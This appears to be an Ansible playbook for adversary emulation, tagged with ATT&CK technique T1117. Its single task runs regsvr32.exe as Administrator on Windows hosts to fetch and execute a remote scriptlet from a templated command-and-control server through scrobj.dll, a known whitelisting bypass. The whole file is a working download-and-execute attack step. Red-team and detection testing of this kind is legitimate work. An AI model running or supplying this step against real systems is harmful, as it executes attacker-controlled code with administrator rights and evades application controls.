#T1117 - Regsvr32
- name: Regsvr32 - Windows
  hosts: windows
  become_method: runas
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
    - name: download and execute
      win_command: |
        regsvr32.exe /s /u /i:http://{{ cnc_fqdn }}:{{ cnc_port}}/{{ cnc_sct }} scrobj.dll
      become: yes
      become_user: Administrator
